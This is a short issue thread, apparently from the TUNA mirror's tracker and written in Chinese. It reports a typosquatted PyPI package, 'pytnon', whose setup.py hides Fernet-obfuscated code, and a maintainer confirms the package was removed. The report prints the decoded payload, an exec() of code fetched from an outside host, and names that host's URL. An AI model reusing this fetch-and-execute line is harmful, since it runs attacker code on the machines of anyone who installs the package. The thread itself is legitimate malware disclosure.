### ISSUE TITLE
https://pypi.tuna.tsinghua.edu.cn/sample发现恶意组件pytnon-1.0.0

### ISSUE THREAD

**Issue by Eclipsewh** [tuna/issues#2006]
该组件的setup.py文件中，涉及fernet混淆码解码，解码结果为exec(requests.get('https://funcaptcha.ru/paste2?package=pytnon').text.replace('<pre>','').replace('</pre>',''))
恶意行为可能涉及：
• 通过 `requests.get` 获取的 URL `'https://funcaptcha.ru/paste2?package=pytnon'` 可能指向一个包含恶意代码的网页。
• 替换 `<pre>` 和 `</pre>` 标签表明获取的内容可能是预格式化的文本，这可能是为了隐藏恶意代码的可见性。

**Comment by shankerwangmiao** [comment]
您好，您提及的软件包已经被删除。
